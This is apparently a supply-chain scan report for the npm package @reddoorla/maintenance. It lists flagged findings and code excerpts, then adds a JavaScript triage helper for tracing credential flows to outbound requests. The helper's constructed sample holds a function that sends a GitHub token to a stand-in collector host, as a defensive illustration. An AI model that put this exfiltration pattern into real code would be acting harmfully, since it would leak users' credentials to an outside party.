
@reddoorla/maintenance@0.67.0

Canonical maintenance configs, audits, and recipes for the reddoor stack.

Static Scan Results

scanned 3d ago · by rust-scanner

Static analysis flagged 13 finding(s) at 72.0% confidence. This version is warn-only unless an AI or security-team review confirms malicious behavior.

Static reason
One or more suspicious static signals were detected.

Decision evidence (public snapshot)

Behavioral surface
Source: Child Process, Crypto, Dynamic Require, Environment Vars, Filesystem, Network, Shell
Supply chain: High Entropy Strings, Obfuscated, Url Strings
Manifest: No manifest risk signals triggered.

Scanned 86 file(s), 412 KB of source. External domains: api.github.com, api.netlify.com, content.airtable.com, developer.chrome.com, docs.renovatebot.com, github.com, images.prismic.io, player.vimeo.com, reddoor-maintenance.netlify.app, searchconsole.googleapis.com, static.cdn.prismic.io, www.googleapis.com, x.invalid

Source & flagged code

4 flagged

dist/chunk-ZO7WNY57.js

104: try {
105:   const { code, stderr } = await spawn(
106:     "npx",
High
Child Process

Package source references child process execution.

Location: dist/chunk-ZO7WNY57.js, line 104

104: try {
105:   const { code, stderr } = await spawn(
106:     "npx",
...
116:   if (e.code === "ENOENT" || /ENOENT/.test(String(err))) {
117:     return { ran: false, stderr: "npx unavailable" };
118:   }
High
Runtime Package Install

Package source invokes a package manager install command at runtime. The visible excerpt spawns `npx` with its arguments elided; `npx` runs a package binary from the local install and fetches the package from the registry when it is not already present, so the package it is asked to run determines what this call can download. The `ENOENT` branch only covers the case where `npx` itself is missing.

Location: dist/chunk-ZO7WNY57.js, line 104

dist/chunk-7MJJEEII.js

31: if (input.fleet === "airtable") {
32:   const { openBase, readAirtableConfig } = await import("./client-EPVO3FEH.js");
33:   const { fromAirtableBase } = await import("./airtable-33SY2UBZ.js");
Medium
Dynamic Require

Package source references dynamic require/import behavior. The excerpt uses `await import()` with fixed relative specifiers for sibling bundle chunks, the form bundlers emit for lazily loaded code; dynamic import becomes a supply-chain concern when the specifier is computed from input or resolves outside the package, which this excerpt does not show.

Location: dist/chunk-7MJJEEII.js, line 31

dist/chunk-SYTPVYIK.js

34: launchHeading: "LAUNCHED",
35: launchBody: "Your site is live. We've set it up on the Reddoor stack with hosting, security, and automatic maintenance so it stays fast and healthy. Here's what's in place:",
36: launchSetupItems: [
...
174: <mj-text color="${RED}" font-size="20px" font-weight="700" padding-top="${labelTop}">LIGHTHOUSE SCORES*</mj-text>${rows}
175: <mj-text color="${GREY}" font-family="helvetica, sans-serif" font-size="12px" font-weight="300" padding-top="24px" padding-bottom="${footnoteBottom}" line-height="20px">*A Lighthou...
176: </mj-column>
...
549: const start = bytes[0] === 239 && bytes[1] === 187 && bytes[2] === 191 ? 3 : 0;
550: const head = Buffer.from(bytes.slice(start, start + 64)).toString("ascii").replace(/^[\s]+/, "").toLowerCase();
551: return head.startsWith("<!doctype html") || head.startsWith("<html") || head.startsWith("<head");
...
571: async function uploadAttachment(recordId, fieldName, body, filename, contentType) {
572:   const apiKey = process.env.AIRTABLE_PAT;
573:   const baseId = process.env.AIRTABLE_BASE_ID;
High
Credential Exfiltration

Source combines credential-like environment material and outbound requests; review data flow before blocking. In the excerpt, `uploadAttachment` reads `AIRTABLE_PAT` and `AIRTABLE_BASE_ID`, and `content.airtable.com` is among the external domains listed above, so the question for review is whether that token reaches only Airtable endpoints and not another listed or undeclared host.

Location: dist/chunk-SYTPVYIK.js, line 34
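The credential-exfiltration finding above asks for a data-flow review rather than a block. The following is an added example, not code from @reddoorla/maintenance or from the scanner, of the kind of triage pass a reviewer can run over a flagged chunk: it maps credential-like `process.env` reads to their local bindings, locates each outbound request call, and reports which credential bindings reach that call's arguments and whether the request host is in the report's declared external-domain list. The sample source, the `collector.example` host, the `GITHUB_TOKEN` variable, the credential-name pattern and all helper names are constructed for the example.

```javascript
// Added triage helper for a "credential + outbound request" static finding.
// Example code written for this page; not code from @reddoorla/maintenance
// or from the scanner that produced the report above.

// Environment variable names that look like credentials. The scanner's own
// rule is not visible on the page; this pattern is an assumption.
const CREDENTIAL_NAME = /(^|_)(TOKEN|SECRET|PAT|KEY|PASSWORD|CREDENTIAL)(_|$)/i;
// `const x = process.env.NAME` bindings.
const ENV_ASSIGN = /\b(?:const|let|var)\s+([A-Za-z_$][\w$]*)\s*=\s*process\.env\.([A-Z0-9_]+)/g;
// Common outbound request calls; the trailing "(" opens the argument list.
const REQUEST_CALL = /\b(?:fetch|axios(?:\.\w+)?|got|request)\s*\(/g;
const URL_HOST = /https?:\/\/([a-z0-9.-]+)/gi;

// External domains the report declares for this package (subset of the
// "scanned 86 file(s)" line above).
const EXPECTED_DOMAINS = ["content.airtable.com", "api.github.com"];

// Map identifier -> env var for bindings whose env var name looks credential-like.
function credentialBindings(source) {
  const bindings = new Map();
  for (const m of source.matchAll(ENV_ASSIGN)) {
    if (CREDENTIAL_NAME.test(m[2])) bindings.set(m[1], m[2]);
  }
  return bindings;
}

// Return the balanced "( ... )" argument list that opens at index `start`.
// Parens inside string literals are not special-cased: good enough for
// triage of a flagged excerpt, not a JavaScript parser.
function callArgs(source, start) {
  let depth = 0;
  for (let i = start; i < source.length; i++) {
    if (source[i] === "(") depth++;
    else if (source[i] === ")" && --depth === 0) return source.slice(start, i + 1);
  }
  return source.slice(start);
}

// For every request call: which credential-bound identifiers appear in its
// arguments, which hosts it targets, and a triage verdict.
function triageRequests(source, expectedDomains) {
  const bindings = credentialBindings(source);
  const results = [];
  for (const m of source.matchAll(REQUEST_CALL)) {
    const args = callArgs(source, m.index + m[0].length - 1);
    const hosts = [...args.matchAll(URL_HOST)].map((h) => h[1].toLowerCase());
    const credentials = [...bindings]
      .filter(([id]) => new RegExp("\\b" + id.replace(/\$/g, "\\$") + "\\b").test(args))
      .map(([, envVar]) => envVar);
    const unexpected = hosts.filter((h) => !expectedDomains.includes(h));
    let verdict;
    if (credentials.length === 0) verdict = "no-credential";
    else if (unexpected.length > 0) verdict = "review";   // credential reaches an undeclared host
    else verdict = "declared-host";                        // credential goes where the package says it talks
    results.push({ call: m[0].trim(), hosts, credentials, unexpectedHosts: unexpected, verdict });
  }
  return results;
}

// Constructed sample resembling the flagged pattern (credential-like env read
// followed by an outbound request). Not the package's real source.
const SAMPLE_SOURCE = `
async function uploadAttachment(recordId, body) {
  const apiKey = process.env.AIRTABLE_PAT;
  const baseId = process.env.AIRTABLE_BASE_ID;
  return fetch("https://content.airtable.com/v0/" + baseId + "/" + recordId + "/uploadAttachment", {
    method: "POST",
    headers: { Authorization: "Bearer " + apiKey, "Content-Type": "application/json" },
    body: JSON.stringify(body),
  });
}
async function phoneHome(meta) {
  const ghToken = process.env.GITHUB_TOKEN;   // hypothetical variable for the example
  return fetch("https://collector.example/ingest", {
    method: "POST",
    body: JSON.stringify({ meta, t: ghToken }),
  });
}
async function rateLimit() {
  return fetch("https://api.github.com/rate_limit");
}
`;

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(triageRequests(SAMPLE_SOURCE, EXPECTED_DOMAINS), null, 2));
}
```

On the constructed sample the Airtable upload comes out as `declared-host` (token bound, host in the declared list), the `collector.example` post as `review` (token bound, host undeclared), and the rate-limit check as `no-credential`. A `declared-host` result is not proof of benign behaviour, only that the flow matches what the package advertises; a credential in the arguments of a call to an undeclared host is the pattern that justifies escalating from warn-only to a block.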

Findings

4 High · 4 Medium · 5 Low

High    Child Process            dist/chunk-ZO7WNY57.js
High    Shell
High    Credential Exfiltration  dist/chunk-SYTPVYIK.js
High    Runtime Package Install  dist/chunk-ZO7WNY57.js
Medium  Dynamic Require          dist/chunk-7MJJEEII.js
Medium  Network
Medium  Environment Vars
Medium  Structural Risk (Force Deep Review)
Low     Scripts Present
Low     Filesystem
Low     Obfuscated
Low     High Entropy Strings
Low     Url Strings